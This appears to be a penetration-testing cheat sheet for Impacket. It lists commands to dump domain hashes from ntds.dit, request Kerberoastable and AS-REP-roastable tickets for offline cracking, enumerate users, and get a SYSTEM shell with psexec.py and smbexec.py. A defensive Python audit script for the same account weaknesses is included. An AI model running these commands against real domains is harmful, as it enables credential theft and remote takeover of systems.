Impacket

Impacket is a collection of Python classes for working with network protocols.

Dump hashes

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

Users

This script will gather data about the domain’s users and their corresponding email addresses.

GetADUsers.py -all -dc-ip <ip> <domain>/<user>:<pw>

This example will try to find and fetch Service Principal Names that are associated with normal user accounts.

GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>:<pw>

-> Crack the hash, e.g. using hashcat, to obtain the password

An application that communicates with the Security Account Manager Remote interface from the MSRPC suite.

samrdump.py <domain>

This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.

GetNPUsers.py <domain>/<user> -no-pass

-> Crack the hash, e.g. using hashcat
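The two scripts above (GetUserSPNs.py and GetNPUsers.py) each select accounts by a property of the directory object: an SPN on an ordinary user account, or the UF_DONT_REQUIRE_PREAUTH bit in userAccountControl. The following audit script, added here and not part of Impacket, applies the same two checks offline to a constructed set of user records, so a defender can see exactly which attribute values make an account appear in those tools' output. The ADUser class, the sample records and the "skip accounts whose name ends in $" heuristic for computer accounts are assumptions of this example; the bit values come from the Windows userAccountControl flag definitions.

```python
"""Offline audit of AD user records for the two conditions GetUserSPNs.py and
GetNPUsers.py look for. Added example; the records below are constructed."""
from dataclasses import dataclass, field
from typing import Dict, List

# userAccountControl bit values (Windows ADS_USER_FLAG_ENUM).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_DONT_REQUIRE_PREAUTH = 0x400000


@dataclass
class ADUser:
    """Hypothetical minimal view of a user object (assumed shape, not an LDAP result)."""
    sam_account_name: str
    user_account_control: int
    service_principal_names: List[str] = field(default_factory=list)

    @property
    def disabled(self) -> bool:
        return bool(self.user_account_control & UF_ACCOUNTDISABLE)

    @property
    def is_computer_account(self) -> bool:
        # Simplifying heuristic: machine accounts are named HOST$.
        return self.sam_account_name.endswith("$")


def preauth_not_required(user: ADUser) -> bool:
    """True when the account has 'Do not require Kerberos preauthentication' set
    and is enabled, i.e. it would be listed by GetNPUsers.py."""
    return (not user.disabled
            and bool(user.user_account_control & UF_DONT_REQUIRE_PREAUTH))


def user_account_with_spn(user: ADUser) -> bool:
    """True for an enabled, non-computer account that carries at least one SPN,
    i.e. the kind of account GetUserSPNs.py reports."""
    return (not user.disabled
            and not user.is_computer_account
            and len(user.service_principal_names) > 0)


def audit(users: List[ADUser]) -> Dict[str, List[str]]:
    """Return the account names matching each condition, in input order."""
    return {
        "preauth_not_required": [u.sam_account_name for u in users if preauth_not_required(u)],
        "user_accounts_with_spn": [u.sam_account_name for u in users if user_account_with_spn(u)],
    }


# Constructed sample directory: names, flags and SPNs are made up for this example.
SAMPLE_USERS = [
    ADUser("alice", UF_NORMAL_ACCOUNT),
    ADUser("svc_legacy", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH),
    ADUser("svc_sql", UF_NORMAL_ACCOUNT, ["MSSQLSvc/db01.corp.example:1433"]),
    # Disabled account: flagged attributes present, but it cannot authenticate.
    ADUser("old_svc", UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH,
           ["HTTP/old.corp.example"]),
    # Computer account: has SPNs by design, not an ordinary user.
    ADUser("WS01$", UF_WORKSTATION_TRUST_ACCOUNT, ["HOST/WS01"]),
]


if __name__ == "__main__":
    for finding, names in audit(SAMPLE_USERS).items():
        print(f"{finding}: {', '.join(names) or '(none)'}")
```

Run against real data, the same two predicates applied to an export of userAccountControl and servicePrincipalName give the list of accounts to remediate: re-enable pre-authentication on the first group, and move the second group to long random passwords or group managed service accounts so a captured ticket is not crackable.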

Shell (psexec.py)

PSEXEC-like functionality example using RemComSvc. -> Get a shell as "nt authority\system"

sudo psexec.py [<domain>/]<user>:[<pw>]@<ip>

SMB (smbexec.py)

sudo smbexec.py <user>:<pw>@<target>
